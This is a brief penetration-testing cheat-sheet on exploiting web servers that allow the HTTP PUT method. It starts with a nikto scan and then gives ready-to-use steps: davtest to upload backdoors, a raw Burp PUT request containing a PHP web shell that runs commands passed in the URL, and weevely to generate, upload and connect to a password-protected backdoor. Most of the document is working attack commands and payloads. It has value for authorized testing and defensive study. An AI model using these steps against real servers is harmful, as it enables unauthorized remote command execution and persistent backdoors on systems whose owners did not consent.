Detection of vulnerability
nikto --host <target ip>:<target port>
If it returns
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
You are potentially in business.
Some options for exploitation:
Try to get a backdoor with davtest
davtest -url http://<target ip>:target port> -sendbd auto -cleanup
This will test all possible payloads it has, send backdoors and clean up after itself afterwards.
Try a basic php backdoor with Burp
Capture a request, and send it to repeater. Change the method to PUT and add some php code to the bottom of the request. It should look roughly like this:
PUT /test.php HTTP/1.1 Host: <target ip>:<target port> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT If-None-Match: "18518f6-5a9-548c16b5e72ae" Cache-Control: max-age=0 Content-Length: 50 <?php echo exec($_GET[cmd]); ?>
Once this is up, navigate to the page and try to run commands like so:
http://<target ip>:<target port>/test.php?cmd=whoami
Create a backdoor with weevely and upload it with poster
Start by downloading the poster addon for firefox.
Next, spawn a backdoor with weevely:
weevely generate evil /root/back.php
This will output back.php with the password evil.
Go ahead and upload this shell using the PUT method with Poster by setting the following fields:
URL: http://<target ip>:<target port>/back.php File: <location of back.php>
and then clicking the PUT button.
Now access the backdoor like so:
weevely http://<target ip>:<target port>/back.php evil
Once you're done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button). Alternatively, since you'll probably have gotten a shell to the system at this point, you can rm it as well.